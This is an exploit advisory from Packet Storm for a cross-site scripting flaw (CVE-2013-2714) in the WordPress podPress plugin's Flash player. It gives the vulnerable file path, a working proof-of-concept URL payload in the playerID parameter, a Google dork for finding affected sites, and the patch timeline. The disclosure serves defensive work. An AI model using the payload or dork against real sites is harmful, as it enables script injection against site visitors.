WordPress podPress 8.8.10.13 Cross Site Scripting

2013-03-29T00:00:00
ID PACKETSTORM:121011
Type packetstorm
Reporter hip
Modified 2013-03-29T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress podPress Plugin XSS in SWF  
# Release Date: 28/03/13  
# Author: hip [Insight-Labs]  
# Contact: hip@insight-labs.org | Website: http://insight-labs.org  
# Software Link: http://downloads.wordpress.org/plugin/podpress.8.8.10.17.zip  
# Tested on: XPsp3  
# Affected version: 8.8.10.13 before  
# Google Dork: inurl:/wp-content/plugins/podpress/  
# REF:CVE-2013-2714  
———————————————————————————————————————–  
# Introduction:  
podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.  
————————————————————————————————————————-  
# XSS – Proof Of Concept:  
vulnerable path:  
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf  
vulnerabile parameter:playerID  
POC:  
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//  
————————————————————————————————————————-  
————  
Patch:  
————  
– Vendor was notified on the 25/02/2013  
– Vendor released version 8.8.10.17 on 19/03/2013 Fixed the bug  
————————————————————————————————————————-  
`